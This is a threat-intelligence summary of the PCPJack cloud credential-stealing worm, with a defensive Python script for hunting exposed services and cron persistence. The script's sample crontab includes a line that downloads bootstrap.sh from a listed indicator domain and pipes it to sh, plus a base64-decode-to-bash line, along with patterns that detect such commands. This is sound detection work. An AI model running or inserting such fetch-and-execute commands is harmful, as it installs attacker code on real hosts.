PCPJack Malware Targets TeamPCP Victims for Credential Theft

Severity: High (Score: 69.5)

Sources: Theregister, Itnews.Au, Techcrunch, Technadu, Darkreading

Summary

The newly discovered PCPJack malware framework is actively targeting cloud environments to steal credentials while removing remnants of the TeamPCP cybercrime group. The worm propagates through exposed services such as Docker, Kubernetes, Redis, and MongoDB, moving from one compromised cloud host to the next. SentinelLabs identified PCPJack on April 28, 2026, noting its ability to evict TeamPCP's tooling and install its own credential-theft modules. The malware is built for large-scale credential theft and is monetized through fraud, spam, and extortion rather than cryptocurrency mining. The initial foothold is a shell script named bootstrap.sh, which establishes persistence and downloads additional modules for credential harvesting. Organizations running these services are urged to harden their cloud footprint, starting with removing unauthenticated Docker, Kubernetes, Redis, and MongoDB endpoints from public exposure. The scope of impact spans cloud, container, developer, and financial services, with significant implications for organizations that rely on these platforms.

Key Points:

  • PCPJack targets cloud services, stealing credentials while removing TeamPCP artifacts.
  • The worm spreads through exposed Docker, Kubernetes, Redis, and MongoDB services.
  • Organizations are advised to enhance cloud security practices to defend against PCPJack.
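The summary names two things a defender can check for on a Linux host: the four services the worm spreads through, and scheduled-job persistence (T1053) that fetches a bootstrap.sh. The script below is an added example written for this page, not code from SentinelLabs or any of the cited sources. It parses the output of `ss -ltn` to flag those services listening on a non-loopback address, and scans crontab text for download-and-execute patterns. The port list, the cron patterns, and the sample inputs are assumptions constructed here; the two domains from the entity list are used only as hunt strings, not as confirmed infrastructure for this campaign.

```python
"""Host hunt for the exposure and persistence described in the PCPJack summary.

Inputs are plain text: the output of `ss -ltn` and the concatenated contents of
crontab files. Both sample inputs below are constructed for illustration.
"""
import re
from typing import Dict, List, Tuple

# Default ports for the services the summary names (assumed; adjust to your estate).
RISKY_PORTS: Dict[int, str] = {
    2375: "Docker API (plaintext)",
    2376: "Docker API (TLS)",
    6443: "Kubernetes API server",
    10250: "kubelet",
    6379: "Redis",
    27017: "MongoDB",
}

LOOPBACK = {"127.0.0.1", "[::1]", "::1"}

# Hunt patterns: bootstrap.sh and scheduled-job persistence come from the summary;
# the two domains are the ones the page's entity list names, treated here as
# hypothetical indicators rather than confirmed C2.
CRON_INDICATORS: Dict[str, re.Pattern] = {
    "bootstrap.sh fetch": re.compile(r"bootstrap\.sh", re.I),
    "download piped to shell": re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(ba|z|da)?sh\b", re.I),
    "base64-decoded payload (T1027)": re.compile(r"base64\s+(-d|--decode)\b", re.I),
    "listed domain": re.compile(
        r"cdn\.cloudfront-js\.com|spm-cdn-assets-dist-2026\.s3\.us-east-2\.amazonaws\.com", re.I
    ),
}


def _split_local(local: str) -> Tuple[str, int]:
    """Split an ss 'Local Address:Port' field; IPv6 stays bracketed, e.g. '[::]'."""
    addr, _, port = local.rpartition(":")
    return addr, int(port)


def exposed_services(ss_output: str) -> List[Tuple[str, int, str]]:
    """Return (address, port, service) for risky ports bound to anything but loopback."""
    findings = []
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) < 4 or fields[0] != "LISTEN":  # skips the header line too
            continue
        addr, port = _split_local(fields[3])
        if port in RISKY_PORTS and addr not in LOOPBACK and not addr.startswith("127."):
            findings.append((addr, port, RISKY_PORTS[port]))
    return findings


def suspicious_cron(cron_text: str) -> List[Tuple[int, str, List[str]]]:
    """Return (line number, line, matched indicator names) for each suspicious cron entry."""
    hits = []
    for n, line in enumerate(cron_text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        matched = [name for name, rx in CRON_INDICATORS.items() if rx.search(stripped)]
        if matched:
            hits.append((n, stripped, matched))
    return hits


# Constructed sample `ss -ltn` output: Redis, Docker and kubelet on all interfaces,
# MongoDB correctly bound to loopback, SSH present but not in scope.
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*
LISTEN 0      128    0.0.0.0:6379        0.0.0.0:*
LISTEN 0      4096   *:2375              *:*
LISTEN 0      128    127.0.0.1:27017     0.0.0.0:*
LISTEN 0      4096   [::]:10250          [::]:*
"""

# Constructed crontab content: one fetch-and-run entry, one benign job, one encoded payload.
SAMPLE_CRON = """\
# constructed /etc/cron.d content for illustration
*/5 * * * * root curl -fsSL http://cdn.cloudfront-js.com/bootstrap.sh | sh
0 3 * * * root /usr/local/bin/backup.sh --full
@reboot root echo ZWNobyBoaQ== | base64 -d | bash
"""

if __name__ == "__main__":
    for addr, port, svc in exposed_services(SAMPLE_SS):
        print(f"EXPOSED  {svc:<24} {addr}:{port}")
    for n, line, names in suspicious_cron(SAMPLE_CRON):
        print(f"CRON#{n}  {', '.join(names)}\n         {line}")
```

On a real host, feed it `ss -ltn` and the contents of `/etc/crontab`, `/etc/cron.d/*`, and each user's crontab; a service bound to `0.0.0.0`, `*`, or `[::]` is only a finding if it is also reachable from outside the trust boundary, so pair the port check with your firewall or security-group rules before acting on it.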

Key Entities

  • TeamPCP (apt_group)
  • Data Breach (attack_type)
  • Malware (attack_type)
  • Phishing (attack_type)
  • Supply Chain Attack (attack_type)
  • Worm (attack_type)
  • CanisterWorm (malware)
  • Sliver (malware)
  • PCPCat Campaigns (campaign)
  • PCPJack (campaign)
  • PCPJack Campaign (campaign)
  • Anthropic (company)
  • Aqua Security (company)
  • DigitalOcean (company)
  • European Commission (company)
  • Mercor (company)
  • Discord (platform)
  • Bitcoin (platform)
  • Common Crawl (platform)
  • Digital Ocean (platform)
  • GitHub (platform)
  • LiteLLM (tool)
  • Docker (tool)
  • GitHub Actions (tool)
  • Gmail (tool)
  • Trivy (tool)
  • CWE-200 - Exposure of Sensitive Information (cwe)
  • cdn.cloudfront-js.com (domain)
  • spm-cdn-assets-dist-2026.s3.us-east-2.amazonaws.com (domain)
  • Financial (industry)
  • T1003 - OS Credential Dumping (mitre_attack)
  • T1021 - Remote Services (mitre_attack)
  • T1027 - Obfuscated Files or Information (mitre_attack)
  • T1041 - Exfiltration Over C2 Channel (mitre_attack)
  • T1053 - Scheduled Task/Job (mitre_attack)